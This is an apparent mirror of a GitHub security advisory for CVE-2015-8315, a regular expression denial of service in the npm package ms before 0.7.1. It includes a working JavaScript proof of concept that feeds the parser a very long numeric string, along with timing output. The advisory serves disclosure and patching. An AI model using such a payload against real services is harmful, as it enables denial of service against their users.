Ecosyste.ms: Advisories

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNmeDUtZnd2ci14cmpn

Regular Expression Denial of Service in ms

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

var ms = require('ms');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Results

Showing increase in execution time based on the input string.

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s

Permalink: https://github.com/advisories/GHSA-3fx5-fwvr-xrjg
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNmeDUtZnd2ci14cmpn
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 6 years ago
Updated: 6 months ago

CVSS Score: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Identifiers: GHSA-3fx5-fwvr-xrjg, CVE-2015-8315
References:

• https://nvd.nist.gov/vuln/detail/CVE-2015-8315
• https://support.f5.com/csp/article/K46337613?utm_source=f5support&utm_medium=RSS
• http://www.openwall.com/lists/oss-security/2016/04/20/11
• https://web.archive.org/web/20200227190911/http://www.securityfocus.com/bid/96389
• https://github.com/advisories/GHSA-3fx5-fwvr-xrjg

Blast Radius: 47.7

Affected Packages